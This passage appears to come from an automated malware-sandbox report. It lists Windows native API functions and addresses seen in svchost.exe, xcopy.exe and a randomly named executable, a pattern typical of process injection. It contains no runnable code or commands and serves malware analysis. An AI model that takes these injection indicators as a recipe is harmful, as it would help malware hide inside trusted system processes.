                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673010 NtOpenDirectoryObject,1_2_03673010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673090 NtSetValueKey,1_2_03673090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03674650 NtSuspendThread,1_2_03674650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672BE0 NtQueryValueKey,1_2_03672BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672BF0 NtAllocateVirtualMemory,1_2_03672BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672BA0 NtEnumerateValueKey,1_2_03672BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672B80 NtQueryInformationFile,1_2_03672B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672AF0 NtWriteFile,1_2_03672AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672AD0 NtReadFile,1_2_03672AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672AB0 NtWaitForSingleObject,1_2_03672AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036739B0 NtGetContextThread,1_2_036739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672F60 NtCreateProcessEx,1_2_03672F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672F30 NtCreateSection,1_2_03672F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672FE0 NtCreateFile,1_2_03672FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672FA0 NtQuerySection,1_2_03672FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672FB0 NtResumeThread,1_2_03672FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672F90 NtProtectVirtualMemory,1_2_03672F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672E30 NtWriteVirtualMemory,1_2_03672E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672EE0 NtQueueApcThread,1_2_03672EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672EA0 NtAdjustPrivilegesToken,1_2_03672EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672E80 NtReadVirtualMemory,1_2_03672E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673D70 NtOpenThread,1_2_03673D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672D30 NtUnmapViewOfSection,1_2_03672D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672D00 NtSetInformationFile,1_2_03672D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672D10 NtMapViewOfSection,1_2_03672D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673D10 NtOpenProcessToken,1_2_03673D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672DD0 NtDelayExecution,1_2_03672DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672DB0 NtEnumerateKey,1_2_03672DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672C60 NtCreateKey,1_2_03672C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672C70 NtFreeVirtualMemory,1_2_03672C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672C00 NtQueryInformationProcess,1_2_03672C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672CF0 NtOpenProcess,1_2_03672CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672CC0 NtQueryVirtualMemory,1_2_03672CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672CA0 NtQueryInformationToken,1_2_03672CA0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D4340 NtSetContextThread,LdrInitializeThunk,6_2_035D4340
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D4650 NtSuspendThread,LdrInitializeThunk,6_2_035D4650
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D35C0 NtCreateMutant,LdrInitializeThunk,6_2_035D35C0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D2B60 NtClose,LdrInitializeThunk,6_2_035D2B60
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_035D2BF0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_035D2BE0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D2BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_035D2BA0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D2AD0 NtReadFile,LdrInitializeThunk,6_2_035D2AD0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D2AF0 NtWriteFile,LdrInitializeThunk,6_2_035D2AF0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D39B0 NtGetContextThread,LdrInitializeThunk,6_2_035D39B0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D2F30 NtCreateSection,LdrInitializeThunk,6_2_035D2F30
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D2FE0 NtCreateFile,LdrInitializeThunk,6_2_035D2FE0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D2FB0 NtResumeThread,LdrInitializeThunk,6_2_035D2FB0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_035D2EE0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D2E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_035D2E80
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_035D2D10
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_035D2D30
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D2DD0 NtDelayExecution,LdrInitializeThunk,6_2_035D2DD0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_035D2DF0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_035D2C70
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D2C60 NtCreateKey,LdrInitializeThunk,6_2_035D2C60
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_035D2CA0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D3010 NtOpenDirectoryObject,6_2_035D3010
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D3090 NtSetValueKey,6_2_035D3090
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D2B80 NtQueryInformationFile,6_2_035D2B80
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D2AB0 NtWaitForSingleObject,6_2_035D2AB0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D2F60 NtCreateProcessEx,6_2_035D2F60
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D2F90 NtProtectVirtualMemory,6_2_035D2F90
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D2FA0 NtQuerySection,6_2_035D2FA0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D2E30 NtWriteVirtualMemory,6_2_035D2E30
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D2EA0 NtAdjustPrivilegesToken,6_2_035D2EA0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D3D70 NtOpenThread,6_2_035D3D70
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D3D10 NtOpenProcessToken,6_2_035D3D10
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D2D00 NtSetInformationFile,6_2_035D2D00
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D2DB0 NtEnumerateKey,6_2_035D2DB0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D2C00 NtQueryInformationProcess,6_2_035D2C00
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D2CC0 NtQueryVirtualMemory,6_2_035D2CC0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D2CF0 NtOpenProcess,6_2_035D2CF0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_00A49070 NtClose,6_2_00A49070
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_00A491D0 NtAllocateVirtualMemory,6_2_00A491D0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_00A48D70 NtCreateFile,6_2_00A48D70
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_00A48EE0 NtReadFile,6_2_00A48EE0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_00A48FD0 NtDeleteFile,6_2_00A48FD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004184B31_2_004184B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004100631_2_00410063
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E0E31_2_0040E0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004030801_2_00403080
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042E9A31_2_0042E9A3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004011B01_2_004011B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E22D1_2_0040E22D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402C6D1_2_00402C6D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402C701_2_00402C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004024701_2_00402470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FE431_2_0040FE43
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004166F31_2_004166F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362D34C1_2_0362D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FA3521_2_036FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F132D1_2_036F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E3F01_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037003E61_2_037003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0368739A1_2_0368739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E02741_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED1_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365D2F01_2_0365D2F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365B2C01_2_0365B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036452A01_2_036452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367516C1_2_0367516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F1721_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370B16B1_2_0370B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C81581_2_036C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036301001_2_03630100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA1181_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F81CC1_2_036F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364B1B01_2_0364B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037001AA1_2_037001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F70E91_2_036F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FF0E01_2_036FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EF0CC1_2_036EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C01_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036407701_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036647501_2_03664750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363C7C01_2_0363C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FF7B01_2_036FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365C6E01_2_0365C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F16CC1_2_036F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F75711_2_036F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036405351_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DD5B01_2_036DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037005911_2_03700591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036314601_2_03631460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F24461_2_036F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FF43F1_2_036FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EE4F61_2_036EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFB761_2_036FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FAB401_2_036FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B5BF01_2_036B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367DBF91_2_0367DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F6BD71_2_036F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365FB801_2_0365FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B3A6C1_2_036B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFA491_2_036FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F7A461_2_036F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EDAC61_2_036EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DDAAC1_2_036DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03685AA01_2_03685AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA801_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036569621_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036499501_2_03649950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365B9501_2_0365B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A01_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370A9A61_2_0370A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036428401_2_03642840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364A8401_2_0364A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AD8001_2_036AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036438E01_2_036438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E8F01_2_0366E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036268B81_2_036268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B4F401_2_036B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03682F281_2_03682F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03660F301_2_03660F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFF091_2_036FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632FC81_2_03632FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFFB11_2_036FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03641F921_2_03641F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640E591_2_03640E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FEE261_2_036FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FEEDB1_2_036FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03649EB01_2_03649EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652E901_2_03652E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FCE931_2_036FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F7D731_2_036F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03643D401_2_03643D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F1D5A1_2_036F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364AD001_2_0364AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363ADE01_2_0363ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365FDC01_2_0365FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03658DBF1_2_03658DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B9C321_2_036B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640C001_2_03640C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630CF21_2_03630CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFCF21_2_036FFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0CB51_2_036E0CB5
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0358D34C6_2_0358D34C
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0365A3526_2_0365A352
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0365132D6_2_0365132D
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_036603E66_2_036603E6
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035AE3F06_2_035AE3F0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035E739A6_2_035E739A
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_036402746_2_03640274
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_036412ED6_2_036412ED
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035BB2C06_2_035BB2C0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035BD2F06_2_035BD2F0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035A52A06_2_035A52A0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0366B16B6_2_0366B16B
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0358F1726_2_0358F172
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035D516C6_2_035D516C
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_036281586_2_03628158
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035901006_2_03590100
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0363A1186_2_0363A118
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_036581CC6_2_036581CC
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_036601AA6_2_036601AA
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035AB1B06_2_035AB1B0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0365F0E06_2_0365F0E0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_036570E96_2_036570E9
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035A70C06_2_035A70C0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0364F0CC6_2_0364F0CC
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035C47506_2_035C4750
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035A07706_2_035A0770
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0359C7C06_2_0359C7C0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0365F7B06_2_0365F7B0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_036516CC6_2_036516CC
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035BC6E06_2_035BC6E0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_036575716_2_03657571
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035A05356_2_035A0535
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0363D5B06_2_0363D5B0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_036605916_2_03660591
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_036524466_2_03652446
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035914606_2_03591460
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0365F43F6_2_0365F43F
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0364E4F66_2_0364E4F6
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0365FB766_2_0365FB76
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0365AB406_2_0365AB40
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03615BF06_2_03615BF0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035DDBF96_2_035DDBF9
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03656BD76_2_03656BD7
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035BFB806_2_035BFB80
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03613A6C6_2_03613A6C
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03657A466_2_03657A46
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0365FA496_2_0365FA49
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0364DAC66_2_0364DAC6
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0363DAAC6_2_0363DAAC
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0359EA806_2_0359EA80
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035E5AA06_2_035E5AA0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035A99506_2_035A9950
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035BB9506_2_035BB950
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035B69626_2_035B6962
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0366A9A66_2_0366A9A6
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035A29A06_2_035A29A0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035A28406_2_035A2840
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035AA8406_2_035AA840
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0360D8006_2_0360D800
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035CE8F06_2_035CE8F0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035A38E06_2_035A38E0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035868B86_2_035868B8
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03614F406_2_03614F40
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0365FF096_2_0365FF09
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035C0F306_2_035C0F30
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035E2F286_2_035E2F28
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03592FC86_2_03592FC8
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035A1F926_2_035A1F92
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0365FFB16_2_0365FFB1
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035A0E596_2_035A0E59
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0365EE266_2_0365EE26
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0365EEDB6_2_0365EEDB
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035B2E906_2_035B2E90
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035A9EB06_2_035A9EB0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0365CE936_2_0365CE93
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03657D736_2_03657D73
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035A3D406_2_035A3D40
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03651D5A6_2_03651D5A
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035AAD006_2_035AAD00
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035BFDC06_2_035BFDC0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0359ADE06_2_0359ADE0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035B8DBF6_2_035B8DBF
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03619C326_2_03619C32
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_035A0C006_2_035A0C00
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0365FCF26_2_0365FCF2
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03590CF26_2_03590CF2
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03640CB56_2_03640CB5
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_00A31B506_2_00A31B50
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_00A351906_2_00A35190
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_00A333D06_2_00A333D0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_00A4B6806_2_00A4B680
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_00A2CB206_2_00A2CB20
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_00A2ADC06_2_00A2ADC0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_00A2CD406_2_00A2CD40
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_00A2AF0A6_2_00A2AF0A
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0335E3356_2_0335E335
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0335E7EE6_2_0335E7EE
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_033654046_2_03365404
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0335E4536_2_0335E453
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0335CB436_2_0335CB43
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0335D8B86_2_0335D8B8
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeCode function: 7_2_05655FEF7_2_05655FEF
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeCode function: 7_2_05650FBF7_2_05650FBF
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeCode function: 7_2_0565962F7_2_0565962F
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeCode function: 7_2_056511DF7_2_056511DF
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeCode function: 7_2_0565786F7_2_0565786F
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeCode function: 7_2_0566FB1F7_2_0566FB1F
                Source: C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exeCode function: 7_2_0564F3A97_2_0564F3A9
